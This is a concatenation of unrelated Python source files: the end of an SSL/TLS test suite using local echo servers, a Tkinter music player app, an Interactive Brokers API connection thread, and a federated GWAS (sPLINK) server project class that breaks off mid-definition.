"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
            # Client waits until the server is set up, then connects.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
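# Collects the test classes, prints OpenSSL/platform details in verbose mode
# and only adds ThreadedTests when the threading module is available.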
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
main.py
from tkinter import *
import os
import time
import threading
from mutagen.mp3 import MP3
from tkinter import filedialog
import tkinter.messagebox
from tkinter import ttk # to improve the styles of buttons and widgets
from ttkthemes import themed_tk as tk
from pygame import mixer
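# Updates the "now playing" label, computes the track length (mutagen for
# .mp3 files, pygame's Sound for .wav/.ogg) and starts the countdown thread.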
def show_Details(play_it):
Main_text['text'] = 'Playing.....' + ' ' + os.path.basename(play_it)
Main_text['anchor'] = 'e'
file_ext = os.path.splitext(play_it)
if file_ext[1] == '.mp3': # To handle mp3 files using mutagen
audio_lenth = MP3(play_it)
total_lenth = audio_lenth.info.length
else: # to handle .wav,.ogg music file extensions
a = mixer.Sound(play_it)
total_lenth = a.get_length()
m, s = divmod(total_lenth, 60)
m = round(m)
s = round(s)
time_format = '{:02d}:{:02d}'.format(m, s)
Main_lenth['text'] = 'Duration : '+' '+time_format
thread1 = threading.Thread(target=rem_count, args=(total_lenth,))
thread1.start()
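# Countdown thread body: ticks once per second while the track is playing and
# refreshes the "Current Duration" label.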
def rem_count(total_lenth):
global paused
curr_secs = 0
    while curr_secs <= total_lenth and mixer.music.get_busy():
        if paused:
            # while paused, wait without advancing the counter (and without
            # spinning the CPU in a tight loop)
            time.sleep(1)
            continue
        else:
            m, s = divmod(curr_secs, 60)
            m = round(m)
            s = round(s)
            time_format = '{:02d}:{:02d}'.format(m, s)
            current_lenth['text'] = 'Current Duration : ' + ' ' + time_format
            time.sleep(1)
            curr_secs += 1
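# Resumes playback if currently paused, otherwise loads and plays the track
# selected in the playlist.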
def Play_music():
global paused
if paused:
mixer.music.unpause()
# global paused = FALSE
status_bar['text'] = 'Playing Music.....' + \
' ' + os.path.basename(music_file)
status_bar['anchor'] = 'w'
paused = FALSE
else:
try:
Stop_music()
time.sleep(1)
song = play_list.curselection()
song = int(song[0])
play_it = music_list[song]
mixer.music.load(play_it)
mixer.music.play()
status_bar['text'] = 'Playing Music.....' + \
' ' + os.path.basename(play_it)
status_bar['anchor'] = 'w'
show_Details(play_it)
        except Exception:
tkinter.messagebox.showerror("Error", "File Not Selected")
def Stop_music():
    global paused
    mixer.music.stop()
    status_bar['text'] = 'Music Stopped'
    status_bar['anchor'] = 'e'
    paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
status_bar['text'] = 'Music Paused...'
status_bar['anchor'] = 'e'
def rewind_music():
Play_music()
    status_bar['text'] = 'Music Rewound...'+' '+os.path.basename(music_file)
status_bar['anchor'] = 'e'
def close_window_fully():
Stop_music()
exit()
def set_vol(val):
vol = float(val)/100
mixer.music.set_volume(vol)
def about_us():
    tkinter.messagebox.showinfo(
        'About Rockerz', 'This Is A Music Player Developed With Python Tkinter And Pygame By Robin Singh')
def browse_files():
global music_file
music_file = filedialog.askopenfilename()
add_to_listbox(music_file)
music_list = []
def add_to_listbox(music_file):
file_name = os.path.basename(music_file)
index = 0
play_list.insert(index, file_name)
music_list.insert(index, music_file)
play_list.pack()
index += 1
def delete_btn():
song = play_list.curselection()
song = int(song[0])
play_list.delete(song)
music_list.pop(song)
def mute_music():
global muted
if muted:
mixer.music.set_volume(.7)
vol_button1.configure(image=pic5)
scale1.set(70)
muted = FALSE
else:
mixer.music.set_volume(0)
vol_button1.configure(image=pic4)
scale1.set(0)
muted = TRUE
def close_window_fully1():
Stop_music()
exit()
muted = FALSE
main_window = tk.ThemedTk()
main_window.get_themes()
# themes : 'arc','radiance','breeze','ubuntu' etc
main_window.set_theme("breeze")
# creating toolbar
tool_bar = Menu(main_window)
main_window.config(menu=tool_bar)
status_bar = ttk.Label(main_window, text="Welcome To Rockerz",
relief=SUNKEN, anchor=W, font='verdana 10 italic')
status_bar.pack(side=BOTTOM, fill=X)
# creating sub menus
sub_menu = Menu(tool_bar, tearoff=0) # to remove dashed line from menu
tool_bar.add_cascade(label='File', menu=sub_menu)
sub_menu.add_command(label="Open", command=browse_files)
sub_menu.add_command(label="Exit", command=close_window_fully1)
sub_menu = Menu(tool_bar, tearoff=0) # to remove dashed line from menu
tool_bar.add_cascade(label='Help', menu=sub_menu)
sub_menu.add_command(label="About Us ", command=about_us)
mixer.init()
# main_window.geometry("600x300")
main_window.title("Rockerz")
main_window.iconbitmap("./Music-Player-App/assests/rockerz.ico")
left_frame = Frame(main_window)
left_frame.pack(side=RIGHT, padx=30, pady=20)
play_list = Listbox(left_frame)
play_list.pack()
add_btn = ttk.Button(left_frame, text='ADD', command=browse_files)
add_btn.pack(side=LEFT, padx=3)
del_btn = ttk.Button(left_frame, text='DELETE', command=delete_btn)
del_btn.pack(side=LEFT)
right_frame = Frame(main_window)
right_frame.pack(pady=20)
r_top_frame = Frame(right_frame)
r_top_frame.pack()
Main_text = ttk.Label(
r_top_frame, text="Devloped By Robin Singh", font='arial 10 italic')
Main_text.pack()
Main_lenth = ttk.Label(r_top_frame, text="Length : --:--", relief=GROOVE)
Main_lenth.pack(pady=5)
current_lenth = ttk.Label(
r_top_frame, text="Current Duration : --:--", relief=GROOVE)
current_lenth.pack()
playlist_box = Listbox(main_window)
canvas = Frame(right_frame)
canvas.pack(pady=5)
pic = PhotoImage(file="./Music-Player-App/assests/images/play.png")
play_button1 = ttk.Button(canvas, image=pic, command=Play_music)
play_button1.grid(row=0, column=0, padx=5)
pic1 = PhotoImage(file="./Music-Player-App/assests/images/stop.png")
stop_button1 = ttk.Button(canvas, image=pic1, command=Stop_music)
stop_button1.grid(row=0, column=1, padx=5)
pic2 = PhotoImage(file="./Music-Player-App/assests/images/pause.png")
pause_button1 = ttk.Button(canvas, image=pic2, command=pause_music)
pause_button1.grid(row=0, column=2, padx=5)
bottom_canvas = Frame(right_frame)
bottom_canvas.pack(padx=30, pady=30)
pic3 = PhotoImage(file="./Music-Player-App/assests/images/rewind.png")
rewind_button1 = ttk.Button(bottom_canvas, image=pic3, command=rewind_music)
rewind_button1.grid(row=0, column=0, pady=10)
pic4 = PhotoImage(file="./Music-Player-App/assests/images/002-mute.png")
pic5 = PhotoImage(file="./Music-Player-App/assests/images/001-volume.png")
vol_button1 = ttk.Button(bottom_canvas, image=pic5, command=mute_music)
vol_button1.grid(row=0, column=1)
scale1 = ttk.Scale(bottom_canvas, from_=0, to=100,
orient=HORIZONTAL, command=set_vol)
scale1.set(50)
mixer.music.set_volume(.5)
scale1.grid(row=0, column=3, padx=5, pady=10)
# For overriding close button
main_window.protocol("WM_DELETE_WINDOW", close_window_fully)
main_window.mainloop()
ib_api.py
import logging
from ktrade.config import is_configured, configuration_for
from time import sleep
from ktrade.queues import inbound_queue, outbound_queue
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from threading import Thread
class IBApi(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
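# Runs the IB API message loop (EClient.run); meant to be the target of the
# daemon thread started by start_listening().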
def ib_loop(api):
api.run()
def start_listening(app):
""" The main entry point to the background thread which is responsible
for sending and receiving messages to and from TWS
"""
ib = IBApi()
log = logging.getLogger(__name__)
connected = False
with app.app_context():
log.debug("Started IB background thread")
while not connected:
# sleep(5)
if (is_configured()):
                # App is configured, let's get connecting!
log.debug("App configured. Connecting to TWS")
host = configuration_for("tws_host").value
port = configuration_for("tws_port").value
ib.connect(host, int(port), 1)
api_thread = Thread(target=ib_loop, daemon=True, args=[ib])
api_thread.start()
connected = True
else:
# Not configured. We'll wait a bit then try again
log.debug("App not configured. Will retry in 5 seconds")
sleep(5)
# Now we're connected, we wait for message from the client
log.info("TWS connected. Awaiting messages...")
while True:
message = inbound_queue.get(block=True)
log.info(f'Received message: {message.message_type}')
splink_server_project.py
"""
server-side sPLINK project to aggregate the local parameters from the clients
Copyright 2021 Reza NasiriGerdeh and Reihaneh TorkzadehMahani. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_server.project.hyfed_server_project import HyFedServerProject
from hyfed_server.util.hyfed_steps import HyFedProjectStep
from hyfed_server.util.status import ProjectStatus
from hyfed_server.util.utils import client_parameters_to_list
from hyfed_server.util.data_type import DataType
from splink_server.util.splink_steps import SplinkProjectStep
from splink_server.util.splink_parameters import SplinkGlobalParameter, SplinkLocalParameter, SplinkProjectParameter
from splink_server.util.splink_algorithms import SplinkAlgorithm
from splink_server.util.utils import round_result
import io
import numpy as np
from scipy import stats
from matplotlib import pyplot as plt
import pandas as pd
import multiprocessing
import threading
import logging
logger = logging.getLogger(__name__)
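# Server-side aggregation flow: init -> snp_id -> allele_name -> sample_count,
# then chunked processing starting with non_missing_count; the dictionaries
# initialised in __init__ hold the per-SNP global results.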
class SplinkServerProject(HyFedServerProject):
""" Server side of sPLINK tool """
def __init__(self, creation_request, project_model):
""" Initialize sPLINK project attributes based on the values set by the coordinator """
# initialize base project
super().__init__(creation_request, project_model)
try:
# retrieve the project model instance just created in the parent class
splink_model_instance = project_model.objects.get(id=self.project_id)
# chunk_size
chunk_size = int(creation_request.data[SplinkProjectParameter.CHUNK_SIZE])
splink_model_instance.chunk_size = chunk_size
self.chunk_size = chunk_size * 1000
# covariates
covariates = creation_request.data[SplinkProjectParameter.COVARIATES]
splink_model_instance.covariates = covariates
self.covariates = tuple(
[covariate_name.strip() for covariate_name in covariates.split(',')]) if covariates else ()
# max_iterations
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
max_iterations = int(creation_request.data[SplinkProjectParameter.MAX_ITERATIONS])
splink_model_instance.max_iterations = max_iterations
self.max_iterations = max_iterations
# result directory
result_dir = "splink_server/result"
splink_model_instance.result_dir = result_dir
self.result_dir = result_dir
# save the model
splink_model_instance.save()
logger.debug(f"Project {self.project_id} : sPLINK specific attributes initialized")
# #### chunking attributes
# re-initialized in the init_chunks function
self.total_chunks = -1
self.start_indices_chunks = list()
self.end_indices_chunks = list()
# re-initialized in the next_chunk functions
self.current_chunk = 0
self.chunk_start_index = -1
self.chunk_end_index = -1
self.considered_snp_indices = set() # SNP indices that are NOT ignored due to exceptions
self.in_process_snp_indices = set() # SNP indices whose beta values not converged yet (logistic regression)
self.considered_in_process_snp_indices = set() # it is always self.considered_snp_indices.intersection(self.in_process_snp_indices)
# ##### global parameters/values
self.sample_count = 0
self.snp_id_values = np.array([]) # SNP IDs common among all clients
# attributes related to all algorithms
self.allele_names = dict() # allele names used as the minor/major allele name across all clients' datasets
self.non_missing_sample_counts = dict() # sample count per SNP, where none of phenotype, sex, covariate, and SNP values are missing
self.allele_counts = dict() # first/second allele count for each SNP
self.minor_allele_names = dict()
self.major_allele_names = dict()
self.minor_allele_counts = dict()
self.major_allele_counts = dict()
self.minor_allele_frequencies = dict()
self.major_allele_frequencies = dict()
self.p_values = dict()
# chi-square algorithm attributes
self.contingency_tables = dict()
self.chi_square_values = dict()
self.odd_ratio_values = dict()
self.maf_case = dict() # minor allele frequency for case
            self.maf_control = dict()  # minor allele frequency for control
# linear regression attributes
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
self.xt_x_inverse_matrices = dict()
self.sse_values = dict()
# logistic regression attributes
self.current_beta_iteration = 1
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict() # re-initialized in minor_allele_step
self.new_log_likelihood_values = dict()
self.new_beta_values = dict() # used in multi-processing
self.delta_log_likelihood_threshold = 0.0001
# linear/logistic regression attributes
self.beta_values = dict() # re-initialized in minor_allele_step
self.std_error_values = dict()
self.t_stat_values = dict()
# chromosome_number, base_pair_distance, and p-value for ALL chunks
# used for manhattan plot
self.chromosome_number_all_chunks = []
self.base_pair_distance_all_chunks = []
self.p_value_all_chunks = []
except Exception as model_exp:
logger.error(model_exp)
self.project_failed()
# ############### Project step functions ####################
def init_step(self):
""" Just tell clients to go to the next step """
try:
# tell clients to go to the SNP-ID step
self.set_step(SplinkProjectStep.SNP_ID)
except Exception as init_exception:
logger.error(f'Project {self.project_id}: {init_exception}')
self.project_failed()
def snp_id_step(self):
""" Compute the intersection of the SNP IDs from the clients """
try:
# compute the SNP IDs common among all clients
snp_ids_clients = client_parameters_to_list(self.local_parameters, SplinkLocalParameter.SNP_ID)
intersect_snp_ids = set(snp_ids_clients[0])
for client_snp_ids in snp_ids_clients:
intersect_snp_ids = intersect_snp_ids.intersection(client_snp_ids)
self.snp_id_values = np.array(list(intersect_snp_ids), dtype="S")
if len(self.snp_id_values) == 0:
logger.error("There is no SNP common among all clients!")
self.project_failed()
return
# initialize chunks
self.init_chunks()
# share common SNP IDs with the clients
self.global_parameters[SplinkGlobalParameter.SNP_ID] = self.snp_id_values
# tell clients to go to allele_name step
self.set_step(SplinkProjectStep.ALLELE_NAME)
except Exception as snp_id_exception:
logger.error(f'Project {self.project_id}: {snp_id_exception}')
self.project_failed()
def allele_name_step(self):
""" Ensure the clients employ the same allele name encoding in their datasets """
try:
allele_names_clients = client_parameters_to_list(self.local_parameters, SplinkLocalParameter.ALLELE_NAME)
# initialize allele names for each SNP
for snp_index in np.arange(len(self.snp_id_values)):
snp_alleles = list()
for client_allele_names in allele_names_clients:
snp_alleles.append(client_allele_names[0][snp_index]) # first allele name
snp_alleles.append(client_allele_names[1][snp_index]) # second allele name
# allele names must be sorted to make sure the corresponding counts from clients are consistent
self.allele_names[snp_index] = np.sort(np.unique(snp_alleles))
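# e.g., if one client reports ('A', 'G') and another ('G', 'A') for a SNP, the sorted unique
# set is ['A', 'G'] (length 2); a third allele such as 'T' at any client yields length 3 and
# triggers the consistency check below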
# Ensure there are exactly two allele names for the SNP across all clients' datasets
if len(self.allele_names[snp_index]) != 2:
logger.error(f"Project {self.project_id}: clients are using different allele names in their datasets!")
self.project_failed()
return
# tell clients to go to sample_count step
self.set_step(SplinkProjectStep.SAMPLE_COUNT)
except Exception as allele_name_exception:
logger.error(f'Project {self.project_id}: {allele_name_exception}')
self.project_failed()
def sample_count_step(self):
""" Compute global sample count and init chunks """
try:
# compute global sample count
self.sample_count = self.compute_aggregated_parameter(SplinkLocalParameter.SAMPLE_COUNT,
DataType.NON_NEGATIVE_INTEGER)
# start chunking process
self.setup_next_chunk()
except Exception as sample_count_exception:
logger.error(f'Project {self.project_id}: {sample_count_exception}')
self.project_failed()
def non_missing_count(self):
